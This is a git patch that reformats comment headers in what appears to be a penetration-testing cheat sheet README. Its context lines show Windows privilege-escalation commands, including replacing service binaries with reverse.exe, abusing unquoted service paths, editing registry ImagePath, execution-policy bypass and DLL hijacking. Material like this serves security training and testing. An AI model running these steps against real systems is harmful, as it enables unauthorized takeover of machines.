From b1cf4a69c2f877873c4d2933f36bdaf59f50e24d Mon Sep 17 00:00:00 2001 From: Joe Totes <59018247+Totes5706@users.noreply.github.com> Date: Sat, 3 Sep 2022 09:37:08 -0400 Subject: [PATCH] Update README.md --- README.md | 32 ++++++++++++++++---------------- 1 file changed, 16 insertions(+), 16 deletions(-) diff --git a/README.md b/README.md index b13215e..91a59b5 100644 --- a/README.md +++ b/README.md @@ -665,7 +665,7 @@ python3 exploit.py [Windows Expoit Suggestor](https://github.com/AonCyberLabs/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py) -```bash +```ps1 # Find information about system systeminfo @@ -683,9 +683,9 @@ python wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only | less .\winPEASany.exe quiet servicesinfo - -# 1. Insecure Service Properties - +##################################### +# 1. Insecure Service Properties #### +##################################### # Verify permissions of a service using accesschk .\accesschk.exe /accepteula -uwcqv user {SERVICE} @@ -702,8 +702,9 @@ config {SERVICE} binpath= "\"C:\{PAYLOAD PATH}\"" # Start a service: net start {SERVICE} - -# 2. Unquoted Service Path +############################### +# 2. Unquoted Service Path #### +############################### # Verify permissions of to start service using accesschk .\accesschk.exe /accepteula -uwcqv user {SERVICE} @@ -718,8 +719,9 @@ copy reverse.exe {BINARY PATH: ex. "C:\Program Files\Unquoted Path Service\Commo net start {SERVICE} - -# 3. Weak Registry Permissions +################################### +# 3. Weak Registry Permissions #### +################################### # Check regsvc for weak entries using powershell powershell -exec bypass @@ -741,11 +743,9 @@ reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND # Start the service: net start regsvc - - - -# 4. Insecure Service Executables (File Permissions: Everyone) - +################################################################### +# 4. Insecure Service Executables (File Permissions: Everyone) #### +################################################################### # Verify permissions of a service using accesschk .\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe" @@ -759,9 +759,9 @@ copy /Y C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepe # Start the service net start filepermsvc - -# 5. DLL Hijacking - +####################### +# 5. DLL Hijacking #### +####################### # Verify permissions of to start service using accesschk .\accesschk.exe /accepteula -uvqc dllsvc